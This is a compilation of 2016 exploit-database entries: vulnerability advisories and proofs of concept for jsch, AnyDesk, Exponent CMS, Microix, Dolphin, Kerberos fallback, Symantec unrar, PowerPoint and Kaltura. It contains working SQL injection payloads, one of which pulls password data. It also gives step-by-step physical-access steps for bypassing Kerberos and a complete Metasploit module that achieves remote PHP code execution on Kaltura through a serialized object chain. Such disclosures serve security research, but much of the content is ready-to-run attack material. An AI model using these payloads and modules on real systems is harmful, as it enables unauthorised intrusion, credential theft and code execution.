aC/ Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
aC/ ---
aC/ [19:36:55] [INFO] the back-end DBMS is MySQL
aC/ web server operating system: Linux Debian 8.0 (jessie)
aC/ web application technology: Apache 2.4.10
aC/ back-end DBMS: MySQL >= 5.0.12
aC/ [19:36:55] [WARNING] HTTP error codes detected during run:
aC/ 500 (Internal Server Error) - 2714 times
aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
aC/
aC/ [*] shutting down at 19:36:55
Advisory: http://www.vapidlabs.com/advisory.php?v=169
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725
Version: 0.3
Date: Aug 31st, 2016
Complete Proof of Concept:
https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40411.zip
Tag: jsch recursive sftp get client-side windows path traversal
Overview
--------
Name: jsch
Vendor: jcraft
References: * http://www.jcraft.com/jsch/ [1]
Version: 0.1.53 [2]
Latest Version: 0.1.54 [2]
Other Versions: <= 0.1.53
Platform(s): windows
Technology: java
Vuln Classes: CWE-22 Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-5725
Description
---------
quote website [1]
> JSch is a pure Java implementation of SSH2. JSch allows you to connect
to an sshd server and use port forwarding, X11 forwarding, file transfer,
etc., and you can integrate its functionality into your own Java programs.
JSch is licensed under BSD style license.
We have recognized that the following applications have used JSch.
* Ant(1.6 or later).
JSch has been used for Ant's sshexec and scp tasks.
* Eclipse(3.0).
Our Eclipse-CVSSSH2 plug-in has been included in Eclipse SDK 3.0.
This plug-in will allow you to get ssh2 accesses to remote CVS
repository
by JSch.
* NetBeans 5.0(and later)
* Jakarta Commons VFS
* Maven Wagon
* Rational Application Devloper for WebSphere Software
* HP Storage Essentials
* JIRA
* Trac WikiOutputStreamPlugin
Summary
-------
A malicious sftp server may force a client-side relative path traversal in
jsch's implementation for recursive sftp-get allowing the server to write
files outside the clients download basedir with effective permissions of the
jsch sftp client process.
* affects recursive get, i.e. sftp <host>:</path>/* .
* post-auth
* file overwrite capability depends on the client specified mode:
`ChannelSftp.get(...,mode==ChannelSftp.OVERWRITE)`
* windows only
see attached PoC
Details
-------
* examples/Sftp.java::main::
c.get(p1, p2, monitor, mode);
* ChannelSftp.java::get(String src, String dst,
SftpProgressMonitor monitor, int mode)
* ChannelSftp.java::_get(src,dst,monitor,mode,skip)
Source
------
see ref github.
Proof of Concept
----------------
see ref github.
poc:
1. run `poc.py` to spawn the ssh/sftp stub listening for new connections
on `0.0.0.0:3373`:
poc.py --host=0.0.0.0 --port=3373 -l DEBUG -k test_rsa.key
INFO:__main__:[cve-2016-5725] sftp server starting...
INFO:__main__:* generating fake files
INFO:__main__:** /..\..\totally_malicious_script
INFO:__main__:* setting up sftp server
INFO:__main__:* monkey patching: chattr
INFO:__main__:* monkey patching: list_folder
INFO:__main__:* monkey patching: mkdir
INFO:__main__:* monkey patching: open
INFO:__main__:* monkey patching: remove
INFO:__main__:* monkey patching: rename
INFO:__main__:* monkey patching: rmdir
INFO:__main__:* monkey patching: stat
INFO:__main__:* monkey patching: symlink
INFO:__main__:* starting sftp server...
0.0.0.0 3373
2. connect to `poc.py` using jsch sftp-client example `examples/Sftp.java`
(any user, user password):
sftp>
3. issue a recursive get (any remote folder will do for the PoC) to store
all files from `remote:fancyfolder` to `.`.
Note: output may contain additional debug information not enabled by default
in `examples/Sftp.java`
Note: pwd is `<path>\workspace-ee\jsch`
Note: local output folder is `.` (`<path>\workspace-ee\jsch`)
sftp> get fancyfolder/* .
3. client connects to `poc.py` with subsystem sftp
DEBUG:paramiko.transport:starting thread (server mode): 0x350afd0L
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.0
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-JSCH-0.1.53
INFO:paramiko.transport:Connected (version 2.0, client JSCH-0.1.53)
DEBUG:paramiko.transport:kex algos:[u'ecdh-sha2-nistp256', ...
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-md5
DEBUG:paramiko.transport:Compression agreed: none
DEBUG:paramiko.transport:kex engine KexGroup1 specified hash_algo ...
DEBUG:paramiko.transport:Switch to new keys ...
DEBUG:paramiko.transport:Auth request (type=none) ...
INFO:paramiko.transport:Auth rejected (none).
DEBUG:paramiko.transport:Auth request (type=password) ...
INFO:paramiko.transport:Auth granted (password).
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 32768 bytes
DEBUG:paramiko.transport:Secsh channel 0 (session) opened.
DEBUG:paramiko.transport:Starting handler for subsystem sftp
4. jsch sftp-client command `get fancyfolder/* .` calls
`opendir(/fancyfolder)`
on the PoC sftp server which responds with a fake filelist for
`fancyfolder`
listing the file `/..\..\totally_malicious_script`.
DEBUG:paramiko.transport.sftp:[chan 0] Started sftp server on channel
<paramiko.Channel 0 (open) window=2097152 -> <paramiko.Transport
at 0x350afd0L (cipher aes128-ctr, 128 bits) (active; 1 open
channel(s))>> DEBUG:paramiko.transport.sftp:[chan 0] Request: realpath
DEBUG:paramiko.transport.sftp:[chan 0] Request: opendir INFO:__main__:LIST
(u'/fancyfolder'): [<SFTPAttributes: [ size=44 uid=0
gid=9 mode=0100666 atime=1472758892 mtime=1472758897 ]>]
DEBUG:paramiko.transport.sftp:[chan 0] Request: readdir
DEBUG:paramiko.transport.sftp:[chan 0] Request: readdir
DEBUG:paramiko.transport.sftp:[chan 0] Request: close
5. jsch sftp-client recursively downloads the files listed in the response
to `opendir(/fancyfolder)` (sftp-get) by
calling `stat`, `open` and `read` on the file.
a) jsch sftp-client calls `stat` on the filename as returned by the servers
response to `opendir` (with traversal):
`stat(/fancyfolder//..\\..\\totally_malicious_script)`
b) the sftp-server (PoC) returns file attributes for
`totally_malicious_script`
(with traversal)
c) jsch sftp-client requests file `open` on the path (with traversal):
`open(/fancyfolder//..\..\totally_malicious_script)`
d) jsch sftp-client builds destination path by concatenating the destination
folder ( `<path>\workspace-ee\jsch\.` ) with the server provided filename
`/..\..\totally_malicious_script` stripping any data before and including
`/` of the filename, then receives the remote files contents: `
<path>\workspace-ee\jsch\.\..\..\totally_malicious_script`
e) the resulting sftp-client local destination path
`dst <path>\workspace-ee\jsch\.\..\..\totally_malicious_script` is outside
the basedir `<path>\workspace-ee\jsch\.`
sftp-server (PoC)
DEBUG:paramiko.transport.sftp:[chan 0] Request: stat INFO:__main__:STAT
(u'/fancyfolder//..\\..\\totally_malicious_script')
INFO:__main__:STAT - returning: totally_malicious_script
INFO:__main__:** /..\..\totally_malicious_script
DEBUG:paramiko.transport.sftp:[chan 0] Request: open
INFO:__main__:OPEN: /fancyfolder//..\..\totally_malicious_script
DEBUG:paramiko.transport.sftp:[chan 0] Request: read
DEBUG:paramiko.transport.sftp:[chan 0] Request: read
DEBUG:paramiko.transport.sftp:[chan 0] Request: read
DEBUG:paramiko.transport.sftp:[chan 0] Request: close
sftp-client (jsch)
dst <path>\workspace-ee\jsch\.\..\..\totally_malicious_script
_get: /fancyfolder//..\..\totally_malicious_script,
java.io.FileOutputStream@7ccf3329
sftp>
6. downloaded file is stored in server controlled relative path on client
tintin@testbox ~<path>/workspace-ee/jsch $ ls ../../total*
../../totally_malicious_script
Notes
-----
* the PoC is a slightly modified version `stub_sftp.py` shipped with
paramiko/tests [4].
* we've seen ssh bots in the wild using jsch probing for weak ssh passwords.
Vendor response: see [5]
References
----------
[1] http://www.jcraft.com/jsch/
[2] https://sourceforge.net/projects/jsch/files/?source=navbar
[3] https://sourceforge.net/projects/jsch/files/jsch/0.1.53
[4] https://github.com/paramiko/paramiko/blob/master/tests/stub_sftp.py
[5] http://www.jcraft.com/jsch/ChangeLog
# Exploit Title: AnyDesk 2.5.0 Unquoted Service Path Elevation of Privilege
# Date: 22/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://anydesk.com
# Software Link: http://anydesk.com/download
# Version: Software Version 2.5.0
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
# Shout-out to carbonated and ozzie_offsec
1. Description:
The Anydesk installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc anydesk
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: anydesk
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\AnyDesk\AnyDesk.exe --service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AnyDesk Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
=============================================
MGC ALERT 2016-005
- Original release date: September 09, 2016
- Last revised: September 20, 2016
- Discovered by: Manuel GarcAa CA!rdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2016-7400
=============================================
I. VULNERABILITY
-------------------------
Blind SQL Injection in Exponent CMS <= v2.3.9
II. BACKGROUND
-------------------------
Exponent CMS is a free, open source, open standards modular enterprise
software framework and content management system (CMS) written in the
programming language PHP.
III. DESCRIPTION
-------------------------
This bug was found using the portal in the index.php page.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code in the "index.php" page
"/exponent/index.php".
IV. PROOF OF CONCEPT
-------------------------
The following URL have been confirmed to all suffer from Blind SQL
injection and Time Based SQL Injection.
Blind SQL Injection POC:
/exponent/index.php'%20or%201%3d1--%20
/exponent/index.php'%20or%201%3d2--%20
Time Based SQL Injection POC:
/exponent/index.php'%20OR%20SLEEP(1)--%20 (2 seconds of response)
/exponent/index.php'%20OR%20SLEEP(30)--%20 (30 seconds of response)
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Exponent CMS <= v2.3.9
VII. SOLUTION
-------------------------
Vendor fix the vulnerability:
http://www.exponentcms.org/news/updated-patches-released-for-v2-1-4-and-v2-2-3-1473726129-0.50310400
VIII. REFERENCES
-------------------------
http://www.exponentcms.org/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
September 09, 2016 1: Initial release
September 20, 2016 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
September 09, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
September 09, 2016 2: Send to vendor
September 12, 2016 3: Vendor fix vulnerability
September 20, 2016 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
# Exploit Title: Kerberos Security Feature Bypass Vulnerability (Kerberos to NTLM Fallback)
# Date: 22-09-2016
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 Professional (x32/x64) and Windows 10 x64
# CVE : CVE-2016-3237
# Category: Local Exploits & Privilege Escalation
SPECIAL CONFIG: Standard Domain Member configuration with password caching enabled (default), BitLocker enabled without PIN or USB key.
REPRODUCE:
Prerequisites:
- Standard Windows 7/10 Fully patched (up until 08/08/2016) and member of an existing domain.
- BitLocker enabled without PIN or USB key.
- Password Caching enabled
- Victim has cached credentials stored on the system from previous logon.
This vulnerability has a similar attack path as MS15-122 and MS16-014 but bypasses the published remediation.
STEP 1: Obtain physical access to a desktop or laptop with the above configuration.
STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1)
STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
STEP 4: Create User with similar name as the previously logged in user. (E.g domain\USER1), and force user to change password upon next login.
STEP 5: Login on the target machine and proceed to the change login screen.
STEP 6: Disable the following (Inbound) Firewall Rules:
- Kerberos Key Distribution Center - PCR (TCP and UDP)
- Kerberos Key Distribution Center (TCP and UDP)
STEP 7: Change the password. (Changing Password screen will appear to hang)
STEP 8: Wait 1 minute before re-enabling the firewall rules defined in STEP 6
STEP 9: Enable firewall rules again and after a few seconds the password should be successfully changed.
STEP 10: Message "Your Password has been changed" is displayed, followed by the following error message "The trust relationship between this workstation and the primary domain failed."
STEP 11: Disconnect Target system's network connection.
STEP 12: Login with the new changed password.
IMPACT: Access gained to the information stored to the target system without previous knowledge of password or any other information. This could also be used to elevate your privileges to local Administrator.
Reference: Video PoC/Demo can be found here: https://www.youtube.com/watch?v=4vbmBrKRZGA
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)
# Exploit Title: Microix timesheet module SQL Injection
# Google Dork: "Copyright by Microix" inurl:"/microixcloud/"
# Date: 2016-09-06
# Software Link: http://www.microix.net/workflow-modules/timesheet-module/
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://www.3fforensics.com/
# CVE:
# Category: webapps
1. Description
Microix timeclock is vulnerable to a SQL injection. The field that is injectable is:
ctl00$ctl00$ASPxCallbackPanel1Root$ASPxSplitter1$Content$ASPxSplitter2$Content2$ASPxRoundPanel1$ASPxCallbackPanel1$txtUserIDOrBadgeID
Initial contact attempt: 08/22/2016
2nd attempt: 08/29/2016
3rd attempt: 09/05/2016
4th attempt: 09/21/2016
2. Proof of Concept
POST /microixcloud/ HTTP/1.1
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtUserIDOrBadgeID=SQLi&ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1%24txtPassword=asdsadsad&__CALLBACKID=ctl00%24ctl00%24ASPxCallbackPanel1Root%24ASPxSplitter1%24Content%24ASPxSplitter2%24Content2%24ASPxRoundPanel1%24ASPxCallbackPanel1&__CALLBACKPARAM=c0%3ALogin
3. Solution:
None
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=867
In issue 810 we pointed out to Symantec that they hadn't updated their unrar based unpacker for years, and it was vulnerable to dozens of publicly documented flaws.
I had expected Symantec to rebase on 5.4.2 (the latest version as of this writing), but they appear to have just backported fixes for the few issues I sent them.
Here are two known bugs in unrar that are fixed upstream, but not in Symantec's ancient code. If they continue to refuse to rebase, this might take a few iterations to shake the bugs out. Sigh.
As in issue 810, these are remote code execution vulnerabilities at the highest possible privilege level.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40405.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=866
The following crash was observed in Microsoft PowerPoint 2010 running under Windows 7 x86 with application verifier enabled.
File versions are:
mso.dll: 14.0.7166.5000
ppcore.dll: 14.0.7168.5000
Attached crashing file: 3525170180.ppt
Crashing context:
eax=1979aea0 ebx=1638bb50 ecx=1979aea0 edx=0024e340 esi=00000000 edi=00000000
eip=663088d8 esp=0024e330 ebp=0024e330 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
ppcore!DllGetLCID+0x18205e:
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
Call Stack:
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0024e330 663088cc 1979aea0 0024e46c 00000000 ppcore!DllGetLCID+0x18205e
0024e350 663072cb 0024e46c e437cde4 00000000 ppcore!DllGetLCID+0x182052
0024e4c8 662fcbda 1cd76fe8 0024e4f0 0024e574 ppcore!DllGetLCID+0x180a51
0024e598 662fc9ee 00000000 0024e5e0 0024e63e ppcore!DllGetLCID+0x176360
0024e5ac 662e82fd 0024e5e0 0024e63e e4362e14 ppcore!DllGetLCID+0x176174
00250738 662e7c88 17802ef8 073def40 1638bb50 ppcore!DllGetLCID+0x161a83
00250774 6619d3e9 002508a4 00250890 1638bb50 ppcore!DllGetLCID+0x16140e
Disassembly:
663088d2 55 push ebp
663088d3 8bec mov ebp,esp
663088d5 8b4d08 mov ecx,dword ptr [ebp+8]
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
The ecx register is pointing to invalid memory in this crash. Looking at the call stack and disassembly above we can see that this value was passed in as the first argument to the crashing function. The calling function obtained this value from a pointer in stack memory at 0x0024e46c + 0x10:
0:000> dd poi(0024e46c)
1cb7cfa0 00000000 1cb7cfa0 00000002 19045ea0
1cb7cfb0 1979aea0 00000000 00000000 00000000
We can verify that this is allocated memory and find the function that allocated it:
(address changed between runs and is now 0x1cb7cfa0)
0:000> !heap -p -a 1cb7cfa0
address 1cb7cfa0 found in
_DPH_HEAP_ROOT @ 1261000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1d2b14e0: 1cb7cfa0 5c - 1cb7c000 2000
6f748e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
7719616e ntdll!RtlDebugAllocateHeap+0x00000030
7715a08b ntdll!RtlpAllocateHeap+0x000000c4
77125920 ntdll!RtlAllocateHeap+0x0000023a
72eaad1a vrfcore!VerifierSetAPIClassName+0x000000aa
701f16ac vfbasics+0x000116ac
641a6cca mso!Ordinal149+0x000078e0
66118132 ppcore!PPMain+0x00001244
662fcbda ppcore!DllGetLCID+0x00176360
662fc9ee ppcore!DllGetLCID+0x00176174
662e82fd ppcore!DllGetLCID+0x00161a83
Setting breakpoints on ppcore!DllGetLCID+0x00176360 and subsequent memory write access breakpoints at eax+0x10 (there are multiple hits) eventually resulted in the same file crashing with a different context:
eax=00000000 ebx=17c2cb50 ecx=00000000 edx=00000000 esi=1a36eea0 edi=1a36eea0
eip=6625a361 esp=0022e1d0 ebp=0022e1f8 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210293
ppcore!DllGetLCID+0xd3ae7:
6625a361 8b4870 mov ecx,dword ptr [eax+70h] ds:0023:00000070=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0022e1f8 662d7d30 661813c4 ec3f4e62 00000000 ppcore!DllGetLCID+0xd3ae7
0022e220 663088e2 00000000 661813c4 0022e250 ppcore!DllGetLCID+0x1514b6
0022e230 663088cc 1a36eea0 0022e36c 00000000 ppcore!DllGetLCID+0x182068
0022e250 663072cb 0022e36c ec3f4f8a 00000000 ppcore!DllGetLCID+0x182052
0022e3c8 662fcbda 1c7a4fe8 0022e3f0 0022e474 ppcore!DllGetLCID+0x180a
Given the different crashing contexts related to timing when breakpoints are set I suspect this to be a heap corruption bug that Application Verifier does not detect.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40406.zip
# Exploit Title: Dolphin 7.3.0 Error Based SQL Injection
# Date: 20-09-2016
# Software Link: https://www.boonex.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_REQUEST['key']` is not escaped inside `actions.inc.php`.
http://security.szurek.pl/dolphin-730-error-based-sql-injection.html
2. Proof of Concept
http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a
which is rendered as:
Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))'<?xml version='1.0' encoding='UTF-8'?><ray><result value="Error saving setting." status="failed" /></ray>
3. Solution:
Update to version 7.3.1
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Kaltura Remote PHP Code Execution',
'Description' => %q{
This module exploits an Object Injection vulnerability in Kaltura.
By exploiting this vulnerability, unauthenticated users can execute
arbitrary code under the context of the web server user.
Kaltura has a module named keditorservices that takes user input
and then uses it as an unserialized function parameter. The constructed
object is based on the SektionEins Zend code execution POP chain PoC,
with a minor modification to ensure Kaltura processes it and the
Zend_Log function's __destruct() method is called. Kaltura versions
prior to 11.1.0-2 are affected by this issue.
This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Security-Assessment.com', # discovery
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
],
'References' =>
[
['EDB', '39563']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Mar 15 2016',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/'])
]
)
end
def check
r = rand_text_alpha(15 + rand(4))
cmd = "print_r(#{r}).die()"
p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
'vars_get' => {
'kdata' => Rex::Text.encode_base64(p)
}
)
if res && res.body.include?(r)
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
'vars_get' => {
'kdata' => Rex::Text.encode_base64(p)
}
)
end
end
#!/usr/bin/perl
$izd= qq{
██╗███████╗██╗ ██╗███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗
██║╚══███╔╝██║ ██║████╗ ██║██╔══██╗ ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
██║ ███╔╝ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██████╔╝██║ ██║██████╔╝
██║ ███╔╝ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██╔══██╗██║ ██║██╔═══╝
██║███████╗╚██████╔╝██║ ╚████║██║ ██║ ██████╔╝██║ ██║╚██████╔╝██║
╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
};$vg=qq{
▀ ▐░░▄ ▄▄▄▄▄▄▄
▀▀ ▄░ ▐▀▄▀▄ ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
▀▀▀ ▐▄▄░ ▀▐▄ ▄▀▄ ▄ ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
▀ ▄ ▐▀▄ ▀▄░ ▄▄░░ ▀▓▓▓▓▓▓▓▓▓▌
▐▀▄▀▄ ▀▀▄▀▄ ▓▌░░ ▄▄▐▓▀▓▓░▀▓▓▓▌
▀▄▀▄▀▄░ ▐▀▄▀▄ ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄ ▄▄▄▓▓▓▓▄▄▄
▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓ ░░ ▒░░ ▀▀▒▒▒▓▓▒░░░ ░░▒▒▄
▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄ ▒░▒░░ ░░▒░ ░░▓
▐▄ ░░░ ░▒░░▒▌ █▄▒░▄ ▄▓▒░ ▐░░ ░░░▒░ ░░
▓▓░▄▓ ░▒░ ░░▐▓ ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░ ░ ░░░░
▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░ ░░▒▒▒░▒
█░░ ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
▐▒▒▒ █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░ ░ ░░▒░░░ ░▒
▓▒░░▐▒░ ░▓ ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░ ░░░░▒▄░░▒░░ ░▒
▓▒ ░▒▒▒█ ░▒▓ ▐▒▓░▒▒░ ▐░░ ▀▒▒▒░░░ ░ ▐░░▒▒▒ ░ ░
█░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░ ░ ░░░░░ ░░▒▒▒ ░ ▒▒
▀▓▓▀░▓▌▒░▒ ░▒▓▓▓▒▒▒░░░░ ░ ░░▒▒░ ░ ░░▒
▀▀▓▓▌▀░ ░ ░▐▓▓▓▒▓▓▓▄░░░▄ ▐░░░▒▒▒▀ ▐░▒▄░ ▐░░░▒
▐▒▒░░▄▓▓░▌ ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░ ░░▒▒▒▓
▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
▓▒░░░▄ ░░▒▓▀ ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
▀▓▄▒▒▒░░░▒▓ ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
▀▀▀▀ ▀ ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░ ▒
▓▒▒▓▌░░░░░░░▒▌░░░░ ░ ░ ▀ ░▄
▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀ ░░░ ░░░▒▌
▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄ ░░░░░▐░
▄▐█▒ ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀ ▀ ░░▒▌
▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░ ░ ░ ▒▒█▀
▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌ ░ ▐░ ░ ░▒
▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░ ░ ▐░░░ ░█
▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌ ░ ▐░░░ ░░▒
▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░ ░░░░ ░░▒
▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░ ░░░░ ░░
▄▒░░░░ ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░ ░ ░░░░ ░░▒
